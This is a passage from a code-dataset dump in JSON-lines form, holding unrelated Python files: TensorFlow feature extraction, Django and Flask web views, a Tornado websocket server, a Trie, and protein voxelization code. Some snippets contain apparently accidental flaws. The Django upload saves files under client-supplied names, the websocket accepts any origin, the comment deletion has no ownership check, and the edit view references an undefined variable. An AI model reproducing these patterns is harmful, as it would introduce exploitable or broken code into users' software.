tf.nn.avg_pool3d(flow_mixed5c, ksize=[1, 2, 7, 7, 1],\n# strides=[1, 1, 1, 1, 1], padding=snt.VALID)\n flow_feat = flow_mixed5c\n \nflow_variable_map = {}\nfor variable in tf.global_variables():\n if variable.name.split('/')[0] == 'Flow':\n flow_variable_map[variable.name.replace(':0', '')] = variable\nflow_saver = tf.train.Saver(var_list=flow_variable_map, reshape=True)\n\n\n# In[9]:\n\n\ndef get_mean_var(feat):\n feat = np.reshape(feat, (-1, 1024))\n mean = np.mean(feat, axis=0)\n var = np.var(feat, axis=0)\n feat_all = np.hstack((mean, var))\n return feat_all\n\n\n# In[18]:\n\n\ndef extract_feat(feat_extractor='imagenet', data_source='test'):\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.2) # 30% memory of TITAN is enough\n# self.sess = tf.Session(config = tf.ConfigProto(gpu_options=gpu_options)) \n with tf.Session(config = tf.ConfigProto(gpu_options=gpu_options)) as sess:\n feed_dict = {}\n \n rgb_feat_type = 'rgb' + '_' + feat_extractor\n flow_feat_type = 'flow' + '_' + feat_extractor\n \n rgb_saver.restore(sess, checkpoints[rgb_feat_type])\n flow_saver.restore(sess, checkpoints[flow_feat_type])\n# rgb_saver.restore(sess, checkpoints['rgb'])\n# flow_saver.restore(sess, checkpoints['flow'])\n \n tf.logging.info('RGB checkpoint restored')\n tf.logging.info('Flow checkpoint restored')\n \n feat_path = raw_path[data_source]\n \n save_pn = data_source + '_' + feat_extractor\n save_path = save_paths[save_pn]\n\n feat_step = 16\n\n video_list = os.listdir(feat_path)\n# print(len(video_list))\n for video in video_list:\n# video = 'video_test_0001292'\n \n video_path = os.path.join(feat_path, video)\n# if not os.path.exists(video_path):\n# os.makedirs(video_path)\n print(video_path)\n num_frames = len(os.listdir(video_path))/3\n index = np.arange(num_frames-8, step=8)\n# print(len(index))\n for idx in index:\n rgb_batch = get_batch(idx, feat_step, video_path, video, type='rgb')\n flow_batch = get_batch(idx, feat_step, video_path, video, type='flow')\n\n rgb_arr = rgb_batch[np.newaxis, :]\n# rgb_arr = (rgb_arr/255.0)*2-1\n flow_arr = flow_batch[np.newaxis, :]\n# flow_arr = (flow_arr/255.0)*2-1\n\n feed_dict[rgb_input] = rgb_arr\n feed_dict[flow_input] = flow_arr\n\n rgb, flow = sess.run([rgb_feat, flow_feat], feed_dict=feed_dict)\n# print(rgb.shape, flow.shape)\n rgb = get_mean_var(rgb)\n flow = get_mean_var(flow)\n print(rgb.shape, flow.shape)\n save_name = video+'.mp4_'+str(float(idx+1))+'_'+str(float(str(idx+1+feat_step)))+'.npy'\n print(save_path,save_name)\n np.save(os.path.join(save_path, 'rgb', save_name), rgb)\n np.save(os.path.join(save_path, 'flow', save_name), flow)\n \n# break\n \n\n\n# In[19]:\n\n\nextract_feat(feat_extractor=inp1, data_source=inp2)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"feat_extractor(2019.7.25)/extract_feature_7.25.py","file_name":"extract_feature_7.25.py","file_ext":"py","file_size_in_byte":7910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"597746738","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom photologue.models import *\nfrom django.shortcuts import render_to_response\nfrom django.conf import settings\nimport os\nfrom PIL import Image\nimport datetime\nfrom .models import Text\nfrom .models import PhotoTextMap\n\ndef upload(request):\n return render(request,'example1/upload.html')\n\ndef allupload(request):\n try:\n f=request.FILES['xinwentuxiang']\n if f.size > 5000000:\n return HttpResponse(\"it is large!\")\n try:\n parser=ImageFile.Parser()\n for chunk in f.chunks():\n parser.feed(chunk)\n img=parser.close()\n except IOError:\n return HttpResponse(\"it is an io error!\")\n imageName='photologue/photos/'+f.name\n name=settings.STATIC_PATH+'/'+imageName\n \n img=Image.open(f)\n img.save(name) \n\n except UnicodeEncodeError:\n return render_to_response('example1/upload.html',{'image_error':\"please use English\"})\n\n now ='00TB'+datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n photoInfo=Photo(image=imageName,title=now,slug=now,is_public=True)\n photoInfo.save()\n\n phototype=\"0000\" \n \n\n try:\n f1=request.FILES['fengmiantuxiang']\n if f1.size > 5000000:\n return HttpResponse(\"it is large!\")\n try:\n parser1=ImageFile.Parser()\n for chunk1 in f1.chunks():\n parser1.feed(chunk1)\n img1=parser1.close()\n except IOError:\n return HttpResponse(\"it is an io error!\")\n imageName1='photologue/photos/'+f1.name\n name1=settings.STATIC_PATH+'/'+imageName1\n \n img1=Image.open(f1)\n img1.save(name1) \n except UnicodeEncodeError:\n return render_to_response('example1/upload.html',{'image_error':\"please use English\"})\n\n now1 ='11TB'+datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n photoInfo1=Photo(image=imageName1,title=now1,slug=now1,is_public=True)\n photoInfo1.save()\n\n phototype1=\"0001\" \n\n title=request.POST['xinwenwenbenkuang']\n content=request.POST['xinwenwenbenyu']\n name=request.POST['tuxiangwenbenkuang']\n tt=Text()\n tt.text_title=title\n tt.text_content=content\n tt.photo_name=name\n tt.save() \n\n pe=PhotoTextMap()\n pe.PhotoTextMap_texttitle=title\n pe.PhotoTextMap_phototype=phototype\n pe.PhotoTextMap_phototitle=now\n pe.save()\n\n pe1=PhotoTextMap()\n pe1.PhotoTextMap_texttitle=title\n pe1.PhotoTextMap_phototype=phototype1\n pe1.PhotoTextMap_phototitle=now1\n pe1.save() \n\n return HttpResponse(\"it is ok!\") \n\ndef showall(request):\n photo_list= Photo.objects.all()\n text_list=Text.objects.all()\n phototextmap_list=PhotoTextMap.objects.all()\n return render_to_response('example1/showall.html',{'photo_list':photo_list,'text_list':text_list,'phototextmap_list':phototextmap_list})\n\ndef showmore(request,phototextmapPhotoTextMap_phototitle):\n m=phototextmapPhotoTextMap_phototitle\n pp=PhotoTextMap.objects.get(PhotoTextMap_phototitle=m)\n p=pp.PhotoTextMap_texttitle\n t=Text.objects.get(text_title=p)\n photo_list= Photo.objects.all()\n phototextmap_list=PhotoTextMap.objects.all()\n return render_to_response('example1/showmore.html',{'photo_list':photo_list,'phototextmap_list':phototextmap_list,'t':t})\n","sub_path":"gongzuo/example001/example1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"321593267","text":"import time\nimport sys\nn=2520\nb=False\nfor i in range(20,sys.maxsize):\n\tif b==False:\n\t\tfor j in range(2,21):\n\t\t\tif not i%j==0:\n\t\t\t\tbreak\n\t\t\telif j==20:\n\t\t\t\tprint(i)\n\t\t\t\tb=True\n\t\t\t\tbreak\n\telse:\n\t\tbreak\n\n\nprint(time.process_time())\nprint(\" seconds\")\n","sub_path":"euler5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"572071967","text":"import os\nimport sys\nimport tornado.httpserver as httpserv\nimport tornado.websocket as ws\nimport tornado.ioloop as ilop\nimport tornado.web as tw\n\nfrom django.conf import settings\nfrom getaran.data import bacalah\n\nCHECKER = 'Date'\nSTART_LINE = 15\n\n\nclass WSHandler(ws.WebSocketHandler):\n def __init__(self, *args, **kwargs):\n self.cb = ilop.PeriodicCallback(self.send_data, 10000)\n super(WSHandler, self).__init__(*args, **kwargs)\n\n def data_received(self, chunk):\n pass\n\n def check_origin(self, origin):\n return True\n\n def open(self):\n print('Websocket terhubung dengan:', self.request.headers['Origin'])\n self.cb.start()\n\n def send_data(self):\n dt = {}\n files = [x for x in os.listdir(PATH) if x.endswith('.txt')]\n for file in files:\n d_file = os.path.join(PATH, file)\n with open(d_file, 'r') as f:\n first_line = f.readline()\n\n if CHECKER in first_line:\n with open(d_file, 'r') as fs:\n lines = fs.readlines()\n\n with open(d_file, 'w') as fw:\n fw.writelines(lines[START_LINE:])\n df = bacalah.baca(d_file, kondisi='index')\n\n dt[file[1:-4]] = {\n 'depan': {\n 'x': [float(file[1:-4].split('_')[1])] * df['frekuensi'].count().compute(),\n 'y': df['frekuensi'].compute().tolist(),\n 'z': df['ampl_front'].compute().tolist()\n },\n 'belakang': {\n 'x': [float(file[1:-4].split('_')[1])] * df['frekuensi'].count().compute(),\n 'y': list(df['frekuensi'].compute()),\n 'z': list(df['ampl_rear'].compute())\n }\n }\n\n self.write_message(dt)\n\n def on_message(self, message):\n pass\n\n def on_close(self):\n print('Websocket ditutup dari:', self.request.headers['Origin'])\n self.cb.stop()\n\napplication = tw.Application([\n (r'/', WSHandler),\n])\n\nif __name__ == \"__main__\":\n sys.path.append('/home/kiya/Documents/Development/freq')\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'freq.settings')\n PATH = settings.LOKASI_DATA\n\n http_server = httpserv.HTTPServer(application)\n http_server.listen(5678)\n ilop.IOLoop.instance().start()\n","sub_path":"getaran/data/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"567964698","text":"# -*- coding: utf-8 -*\nfrom flask import render_template, redirect, request, url_for, flash, current_app\nfrom flask.ext.login import login_user, logout_user, login_required, \\\n current_user\nfrom .. import db\nfrom ..models import Comment\nfrom . import comment\nfrom .forms import CommentForm\nfrom datetime import datetime\n\n@comment.route('/delete_comment/', methods=['GET', 'POST'])\n@login_required\ndef delete_comment(id):\n comment = Comment.query.filter_by(id=id).first_or_404()\n tid, turl = ( comment.topic.id, 'topic.show_topic') if comment.topic else \\\n (comment.note.id, 'note.show_note')\n\n db.session.delete(comment)\n return redirect(url_for(turl, id=tid))\n\n \n@comment.route('/edit_comment/', methods=['GET', 'POST'])\n@login_required\ndef edit_comment(id):\n form = CommentForm()\n\n if form.validate_on_submit():\n comment.contents = form.body.data\n comment.lastupdate_timestamp = datetime.utcnow()\n db.session.add(comment)\n db.session.commit()\n if comment.topic:\n return redirect(url_for('topic.show_topic', id=comment.topic.id))\n else:\n return redirect(url_for('note.show_note', id=comment.note.id)) \n form.body.data = comment.contents\n return render_template(\"comment/edit_comment.html\", form=form)\n \n","sub_path":"NoteBook/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"419149935","text":"'''\nA trie (pronounced as \"try\") or prefix tree is a tree data structure used to efficiently store and retrieve keys in a dataset of strings. There are various applications of this data structure, such as autocomplete and spellchecker.\nImplement the Trie class:\nTrie() Initializes the trie object.\nvoid insert(String word) Inserts the string word into the trie.\nboolean search(String word) Returns true if the string word is in the trie (i.e., was inserted before), and false otherwise.\nboolean startsWith(String prefix) Returns true if there is a previously inserted string word that has the prefix prefix, and false otherwise.\n\nExample 1:\nInput\n[\"Trie\", \"insert\", \"search\", \"search\", \"startsWith\", \"insert\", \"search\"]\n[[], [\"apple\"], [\"apple\"], [\"app\"], [\"app\"], [\"app\"], [\"app\"]]\nOutput\n[null, null, true, false, true, null, true]\n\nExplanation\nTrie trie = new Trie();\ntrie.insert(\"apple\");\ntrie.search(\"apple\"); // return True\ntrie.search(\"app\"); // return False\ntrie.startsWith(\"app\"); // return True\ntrie.insert(\"app\");\ntrie.search(\"app\"); // return True\n\nUsed as spell checker, autocomplete, IP routing, T9 predictive test, word games\n'''\n\n\"\"\"\nTrie representation in form of nested dictionary:\n\n{ 'b': { 'a': { 'l': { 'l': { '$': True}},\n 't': { '$': True}}},\n 'd': { 'o': { '$': True,\n 'l': { 'l': { '$': True}},\n 'r': { 'k': { '$': True},\n 'm': { '$': True}}}},\n 's': { 'e': { 'n': { 'd': { '$': True},\n 's': { 'e': { '$': True}}}}}}\n\"\"\"\n\nclass Trie:\n def __init__(self):\n \"\"\"\n Initialize your data structure here\n \"\"\"\n self.root = {}\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie\n \"\"\"\n start = self.root\n for i in word:\n if i not in start:\n # This is not a prefix for any word that has been added\n # Initialize an empty dictionary for every letter of the word added\n # Letters of the word is mapped to each other as nested dictionary values\n start[i] = {}\n\n start = start[i] # points to last letter of the word inserted\n\n start['$'] = True # marks the end of word\n\n def search(self, word:str) -> bool:\n \"\"\"\n returns True if word is in Trie\n \"\"\"\n start = self.root\n for i in word:\n if i not in start:\n return False\n start = start[i]\n return '$' in start\n\n def startsWith(self, prefix:str) -> bool:\n \"\"\"\n Returns True if any word has given prefix\n \"\"\"\n start = self.root\n for i in prefix:\n if i not in start:\n return False\n start = start[i]\n return True\n\n\n\n\n# Your Trie object will be instantiated and called as such:\ntrie = Trie()\nprint(trie.insert(\"apple\"))\nprint(trie.search(\"apple\"))\nprint(trie.search(\"app\"))\nprint(trie.startsWith(\"app\"))\nprint(trie.insert(\"app\"))\nprint(trie.search(\"app\"))\n","sub_path":"Leetcode questions and answers/Trie_Implement_Prefix_Trie.py","file_name":"Trie_Implement_Prefix_Trie.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"541539136","text":"from sage.all import *\nfrom phi_computation import *\nfrom lattice_package import *\nimport sys\nimport datetime\nimport logging\n\nM = GLattice.dade(4,9)\nG = M.group\ni = G.sylow_subgroup()\nM = M.restriction(i)\nG = i.domain_group\n\nlog = []\n\nprint(Phi(M))\n\nsys.exit()\n\nx0, x1, x2 = G.get_gens()\nv1, v2, v3, v4 = M._get_basis_elements_list()\np = M.orbit_cover([v2, v3])\nassert p.is_coflasque(verbose=False)\nN_original = p.kernel_map().domain\n\nsys.exit()\n\nbig_groups_generators = [subgroup_gens for subgroup_gens in G.conjugate_subgroups()\n if len(G.subgroup(subgroup_gens).domain_group.get_elements())>4]\n\ncounter=1\nfor subgroup_gens in reversed(big_groups_generators):\n i_H = G.subgroup(subgroup_gens)\n N = N_original.restriction(i_H)\n H = i_H.domain_group\n start = time.time()\n result = Phi(N)\n end = time.time()\n log.append({ 'subgroup H': str(subgroup_gens),\n '#H': str(len(H.get_elements())),\n 'rank of Phi(H, N)': str(result['Phi']),\n 'rank of H1(H, Gamma^2(N)/2)': str(result['H1(H, Gamma^2(N)/2)']),\n 'rank of H1(H, Lambda^2(N)/2)': str(result['H1(H, Lambda^2(N)/2)']),\n 'rank of im(H1(H, Gamma^2(N)/2) -> H1(H, Lambda^2(N)/2)': \\\n str(result['im(H1(H, Gamma^2(N)/2) -> H1(H, Lambda^2(N)/2)']),\n 'rank of im(H1(H, Lambda^2(N)) -> H1(H, Lambda^2(N)/2)': \\\n str(result['im(H1(H, Lambda^2(N)) -> H1(H, Lambda^2(N)/2)']),\n 'computed in': str(end-start)\n })\n print(str(subgroup_gens)+' done '+str(counter)+' out of '+str(len(big_groups_generators)))\n counter+=1\n\nwith open('4dDade9.txt', 'w') as outfile:\n json.dump(log, outfile)\n","sub_path":"4d case/4dcaseDade9.py","file_name":"4dcaseDade9.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"384753033","text":"# coding -*- utf-8 -*-\n\nfrom tksheet import Sheet\nimport tkinter as tk\nfrom student import *\nfrom student_adapter import *\nfrom db_adapter import *\n\nclass demo(tk.Tk):\n def __init__(s, db):\n tk.Tk.__init__(s)\n s.db = db\n \n s.grid_columnconfigure(0,weight=1)\n s.grid_rowconfigure(0,weight=1)\n s.frame = tk.Frame(s)\n s.addBtn = tk.Button(s.frame, text=u'добавить')\n s.addBtn.grid(row=0,column=0,sticky='nswe')\n s.addBtn.config(command = s.click_event)\n s.frame.grid_rowconfigure(0, weight=1)\n s.frame.grid_columnconfigure(0, weight=1)\n s.sheet = Sheet(s.frame,\n page_up_down_select_row = True,\n column_width = 130,\n data = [student_adapter(student,db) for student in db.get_student()]\n )\n s.sheet.enable_bindings((\"single_select\",\n 'edit_cell'))\n\n s.frame.grid(row=0,column=0, sticky = 'nswe')\n s.sheet.grid(row=1,column=0, sticky = 'nswe')\n \n def click_event(s):\n '''\n Add new empty student record\n '''\n s.sheet.insert_row(values=student_adapter(student(),s.db), redraw=True)\n\ndef main():\n mydb = db()\n app = demo(mydb)\n app.mainloop()\n\nif __name__ == '__main__':\n main()\n","sub_path":"tkinter_view.py","file_name":"tkinter_view.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"84246498","text":"from collections import defaultdict\n\nimport numpy as np\nfrom scipy import spatial\nimport numpy.lib.recfunctions\n\nfrom molmimic.common.DistributedStructure import DistributedStructure\nfrom molmimic.common.ProteinTables import vdw_aa_radii\nfrom molmimic.common.features import default_atom_features, default_residue_features\n\nclass DistributedVoxelizedStructure(DistributedStructure):\n def __init__(self, path, key, cath_domain_dataset, coarse_grained=False, file_mode=\"r\",\n volume=264, voxel_size=1.0, rotate=None, use_features=None, predict_features=None,\n replace_na=False, ligand=False):\n super().__init__(path, key, cath_domain_dataset, coarse_grained=coarse_grained,\n file_mode=file_mode)\n\n self.mean_coord = np.zeros(3)\n self.mean_coord_updated = False\n\n self.volume = volume\n self.voxel_size = voxel_size\n self.voxel_tree = None\n self.atom_tree = None\n\n self.use_features = use_features if use_features is not None else self.feature_names\n self.predict_features = predict_features\n\n if self.predict_features is not None and use_features is not None:\n assert len(set(self.predict_features).intersection(set(self.use_features)))==0, \\\n \"Cannot train on and predict the same features\"\n\n self.replace_na = replace_na\n\n self.ligand = ligand\n\n if rotate is None or (isinstance(rotate, bool) and not rotate):\n self.shift_coords_to_volume_center()\n self.set_voxel_size(self.voxel_size)\n elif isinstance(rotate, str) and rotate == \"pai\":\n self.orient_to_pai()\n self.shift_coords_to_volume_center()\n self.set_voxel_size(self.voxel_size)\n elif (isinstance(rotate, str) and rotate == \"random\") or (isinstance(rotate, bool) and rotate):\n next(self.rotate())\n elif isinstance(rotate, np.ndarray):\n next(self.rotate(rotate))\n else:\n raise RuntimeError(\"Invalid rotation option. Must be None or False for no rotation, 'pai' to orient to princple axis, 'random' for random rotation matrix, or an actual roation matrix\")\n\n def create_full_volume(self, input_shape=(96, 96, 96)):\n truth_grid = np.zeros(list(input_shape)+[1])\n for atom in self.get_atoms():\n for grid in self.get_vdw_grid_coords_for_atom(atom[\"X\", \"Y\", \"Z\"]):\n truth_grid[grid[0], grid[1], grid[2], 0] = 1\n return truth_grid\n\n def shift_coords_to_volume_center(self):\n return self.shift_coords(np.array([self.volume/2]*3))\n\n def resize_volume(self, new_volume, shift=True):\n self.volume = new_volume\n if shift:\n self.shift_coords_to_volume_center()\n\n def rotate(self, rvs=None, num=1, return_to=None):\n if return_to is None:\n return_to=[self.volume/2]*3\n for r in super().rotate(rvs=rvs, num=num, return_to=return_to):\n self.set_voxel_size(self.voxel_size)\n yield r\n\n def orient_to_pai(self, random_flip=False, flip_axis=(0.2, 0.2, 0.2)):\n super().orient_to_pai(random_flip=random_flip, flip_axis=flip_axis)\n self.shift_coords_to_volume_center()\n\n def get_features_per_atom(residue_list):\n \"\"\"Get features for eah atom, but not organized in grid\"\"\"\n return self.data[self.data[:,\"residue_id\"].isin(residue_list)]\n\n def get_features(self, residue_list=None, only_aa=False, only_atom=False,\n non_geom_features=False, use_deepsite_features=False, expand_atom=False,\n undersample=False, autoencoder=False):\n if self.coarse_grained:\n return self.map_residues_to_voxel_space(\n truth_residues=residue_list,\n include_full_protein=include_full_protein,\n only_aa=only_aa,\n non_geom_features=non_geom_features,\n undersample=undersample\n )\n return self.map_atoms_to_voxel_space(\n expand_atom=expand_atom,\n truth_residues=residue_list,\n include_full_protein=include_full_protein,\n only_aa=only_aa,\n only_atom=only_atom,\n use_deepsite_features=use_deepsite_features,\n non_geom_features=non_geom_features,\n undersample=undersample)\n\n def map_atoms_to_voxel_space(self, truth_residues=None,\n only_surface=False, autoencoder=False, return_voxel_map=False,\n return_serial=False, return_b=False, nClasses=2, simple_fft=None,\n verbose=False, use_raw_atom_coords=False):\n \"\"\"Map atoms to sparse voxel space.\n\n Parameters\n ----------\n truth_residues : list of Bio.PDB.Residue objects or None\n If a binding is known, add the list of Bio.PDB.Residue objects, usually\n obtained by Structure.align_seq_to_struc()\n include_full_protein : boolean\n If true, all atoms from the protein are used. Else, just the atoms from the\n defined binding site. Only makes sense if truth_residues is not None\n Returns\n -------\n indices : np.array((nVoxels,3))\n data : np.array((nVoxels,nFeatures))\n \"\"\"\n assert not self.coarse_grained, \"Cannot be used with the coarse graned model\"\n assert [isinstance(truth_residues, (list, tuple)), autoencoder, isinstance(self.predict_features, (list, tuple))].count(True) == 1, \\\n \"Only truth_residues or autoencoder can be set\"\n\n if truth_residues is not None:\n predicting_features = False\n else:\n predicting_features = isinstance(self.predict_features, (list, tuple))\n\n data_voxels = defaultdict(lambda: np.zeros(len(self.use_features)))\n truth_voxels = {}\n\n voxel_map = {}\n\n b_factors_voxels = {}\n serial_number_voxels = defaultdict(list)\n\n skipped = 0\n skipped_inside = []\n\n if nClasses == 2:\n true_value_ = np.array([0.,1.])\n neg_value_ = np.array([1.,0.])\n elif nClasses == 1:\n true_value_ = np.array([1.])\n neg_value_ = np.array([0.])\n elif nClasses == \"sfams\":\n raise RuntimeError(\"Sfams not implemented\")\n else:\n true_value_ = np.array([1.])\n neg_value_ = np.array([0.])\n\n data = self.data #[self.use_features]\n\n if self.replace_na:\n for feature in self.use_features:\n ind = data[feature] == np.nan\n data[feature][ind] = default_atom_features[feature]\n\n for atom_index in range(len(self.data)):\n atom = data[atom_index]\n\n if only_surface and atom[\"residue_buried\"]==1:\n continue\n\n if autoencoder or predicting_features:\n truth = True\n elif truth_residues is None:\n truth = False\n else:\n truth = atom[\"residue_id\"] in truth_residues\n\n features = atom[self.use_features]\n\n features = numpy.lib.recfunctions.structured_to_unstructured(features)\n\n if simple_fft is not None:\n features = self.simple_fft_scoring_features(atom, mode=simple_fft)\n\n #Handle truth values if its not an autoencoder\n if predicting_features:\n truth_value = atom[self.self.predict_features]\n elif truth_residues is not None:\n truth_value = true_value_.copy() if truth else neg_value_.copy()\n\n if use_raw_atom_coords:\n grid_coords = [tuple(self.coords[atom_index])]\n else:\n grid_coords = [tuple(g) for g in self.get_vdw_grid_coords_for_atom(atom, atom_index)]\n\n voxel_map[atom[\"serial_number\"]] = grid_coords\n\n for atom_grid in grid_coords:\n try:\n data_value = np.maximum(features, data_voxels[atom_grid])\n data_voxels[atom_grid] = data_value\n except ValueError:\n print(data_voxels[atom_grid].shape, features.shape)\n raise\n if not autoencoder:\n truth_voxels[atom_grid] = np.maximum(\n truth_value, truth_voxels.get(atom_grid, truth_value))\n\n b_factors_voxels[atom_grid] = np.maximum(\n atom[\"bfactor\"], b_factors_voxels.get(atom_grid, 0))\n serial_number_voxels[atom_grid].append(atom[\"serial_number\"])\n\n outputs = None\n\n try:\n coords, feats = zip(*data_voxels.items())\n outputs = [np.array(coords), np.array(feats)]\n\n if truth_residues is not None and not autoencoder:\n truth = np.array([truth_voxels[grid] for grid in coords])\n else:\n truth = None\n\n outputs.append(truth)\n\n except Exception as e:\n print(e)\n raise\n\n if return_voxel_map:\n outputs.append(voxel_map)\n else:\n outputs.append(None)\n\n if return_serial:\n outputs.append([serial_number_voxels[grid] for grid in coords])\n else:\n outputs.append(None)\n\n if return_b:\n outputs.append(np.array([b_factors_voxels[grid] for grid in coords]))\n\n return outputs\n\n def map_residues_to_voxel_space(self, truth_residues=None, only_surface=True,\n autoencoder=False, return_voxel_map=False, return_serial=False, return_b=False,\n nClasses=2, simple_fft=None, verbose=False):\n return map_atoms_to_voxel_space(self, truth_residues=truth_residues,\n only_surface=only_surface, autoencoder=autoencoder,\n return_voxel_map=return_voxel_map, return_serial=return_serial,\n return_b=return_b, nClasses=nClasses, simple_fft=simple_fft,\n verbose=verbose)\n\n def simple_fft_scoring_features(self, atom_or_residue, mode=\"simple\", b=3):\n \"\"\"Rp=−1 on a surface layer and Rp=1 on the core of the receptor,\n Lp=1 on the entire ligand, and Rp=Lp=0 everywhere else. It is clear that\n this scoring function, which is essentially the one used by\n Katchalski-Katzir et al. (5), reaches its minimum on a conformation in\n which the ligand maximally overlaps with the surface layer of the receptor,\n thus providing optimal shape complementarity. https://doi.org/10.1073/pnas.1603929113\"\"\"\n\n if not self.coarse_grained:\n residue_buried = self.atom_features[atom_or_residue, \"residue_rasa\"]<0.5\n charge = self.features[atom_or_residue, \"charge\"]\n electrostatic_potential = self.features[atom_or_residue, \"electrostatic_potential\"]\n else:\n residue_buried = self.features[atom_or_residue, \"residue_buried\"]\n charge = self.features[atom_or_residue, \"charge\"]\n electrostatic_potential = self.eatures[atom_or_residue, \"electrostatic_potential\"]\n\n if mode in [True, \"simple\"]:\n if not self.ligand:\n if residue_buried:\n features = np.array([-15, 0])\n else:\n features = np.array([1, 0])\n else:\n features = np.array([1, 0])\n # if residue_buried:\n # features = np.array([-15, 0])\n # else:\n # features = np.array([1, 0])\n\n return features\n\n elif mode == \"zdock\":\n psc_elec = np.array([\n 3.5**2 if residue_buried else 3.5, #Same for ligand\n charge if not self.ligand else 0\n ])\n\n return psc_elec\n\n else:\n print(\"Mode is\", mode, mode in [True])\n\n def get_vdw_grid_coords_for_atom(self, atom, atom_index):\n dist = self.get_vdw(atom)\n coord = np.around(self.coords[atom_index], decimals=4)\n neighbors = self.voxel_tree.query_ball_point(coord, r=dist)\n for idx in neighbors:\n yield self.voxel_tree.data[idx]\n\n def get_closest_grid_coord_for_atom(self, atom):\n _, neighbors = self.voxel_tree.query([atom.coord])\n for idx in neighbors:\n yield self.voxel_tree.data[idx]\n\n def get_vdw_grid_coords_for_residue(self, residue):\n dist = vdw_aa_radii.get(residue.get_resname(), 3.2)\n center = np.nanmean([a.get_coord() for a in residue], axis=0)\n neighbors = self.voxel_tree.query_ball_point(center, r=dist)\n for idx in neighbors:\n yield self.voxel_tree.data[idx]\n\n def get_closest_grid_coord_for_residue(self, residue):\n center = np.nanmean([a.get_coord() for a in residue], axis=0)\n _, neighbors = self.voxel_tree.query([center])\n for idx in neighbors:\n yield self.voxel_tree.data[idx]\n\n # def rotate(self, rvs=None, num=1):\n # for r, M in super().rotate(rvs=rvs, num=num):\n # self.set_voxel_size(self.voxel_size)\n # yield r, M\n\n def resize_volume(self, new_volume, shift=True):\n super().resize_volume(new_volume, shift=shift)\n self.set_voxel_size(self.voxel_size)\n\n def set_voxel_size(self, voxel_size=None, full_grid=True):\n self.voxel_size = voxel_size or 1.0\n\n coords = self.get_coords()\n min_coord = np.floor(np.nanmin(coords, axis=0))-5\n max_coord = np.ceil(np.nanmax(coords, axis=0))+5\n max_dist = np.linalg.norm(max_coord-min_coord)\n\n if full_grid:\n min_coord_ = np.zeros(3)\n max_coord_ = np.array([self.volume]*3)\n max_dist_ = np.linalg.norm(max_coord_-min_coord_)\n\n fail = False\n if np.any(min_coord=max_coord_):\n print(f\"Max coordinate outside grid: {max_coord} > {max_coord_}\")\n fail=True\n assert not fail\n max_coord = max_coord\n min_coord = min_coord\n\n extent_x = np.arange(min_coord[0], max_coord[0], self.voxel_size)\n extent_y = np.arange(min_coord[1], max_coord[1], self.voxel_size)\n extent_z = np.arange(min_coord[2], max_coord[2], self.voxel_size)\n mx, my, mz = np.meshgrid(extent_x, extent_y, extent_z)\n\n self.voxel_tree = spatial.cKDTree(list(zip(mx.ravel(), my.ravel(), mz.ravel())))\n #spatial.cKDTree(self.get_coords())\n\n def convert_voxels(self, grid, radius=2.75, level=\"A\"):\n \"\"\"Convert grid points to atoms\n \"\"\"\n if self.atom_tree is None:\n self.atom_tree = spatial.cKDTree(list(self.get_atoms()))\n\n idx = self.atom_tree.query_ball_point(grid, radius)\n return self.data[idx]\n\n def get_overlapping_voxels(self):\n neighbor_atoms = self.calculate_neighbors(d_cutoff=5.0, level=\"A\")\n for a1, a2 in neighbor_atoms:\n v1 = set(self.get_vdw_grid_coords_for_atom(a1))\n v2 = set(self.get_vdw_grid_coords_for_atom(a2))\n overlap = v1.intersection(v2)\n yield a1, a2, overlap\n","sub_path":"molmimic/common/DistributedVoxelizedStructure.py","file_name":"DistributedVoxelizedStructure.py","file_ext":"py","file_size_in_byte":15125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"168414493","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# alexnet_obj_return.py\n\n\"\"\"\nThe script is the self-consistent realization of object-oriented style of the Vgg16 model with the \nreturn value \"conv_base\" or \"model\". It is an attempt to re-organize both the conv_base and fc_base\nfor flexible usage. \n\nIn addtion, it has a consolidated structure with the purely Tensorflow 2.x. We set the same 1000 class \nnumbers. Please use the following call convention if users adopt any client script to call the AlexNet \nmodel.\n\nIssues:\n\nThe script includes deplicated line of code because the function of Concatenate or k.concatenate can \nnot assembe the abstact layers in the Sequential Model. Therefore, we need to eliminatee the repeated \ncode for elegant realization. \n\n# https://keras.io/api/layers/merging_layers/concatenate/\n# -from tensorflow.keras.layers import Concatenate\nor\n# -import keras.backend as K\nor \n# -model = merge(conv_base + fc_base) \n\nAccording to the formula of Stanford cs231, W_output = (W-F+2P)/S + 1. W,F,P,S are input width, filter \nwidth, padding size and stride respectively. It is the apparent result of H_output = W_output since we \nrequires the square size of filters.\n\nStanford c231n \nhttps://cs231n.github.io/convolutional-networks/#conv\n\nVery Deep Convolutional Networks for Large-Scale Image Recognition\nICLR 2015: https://arxiv.org/abs/1409.1556\n\nKeras code: \nhttps://github.com/keras-team/keras-applications/blob/master/keras_applications/vgg16.py\n\nTensorflow code: 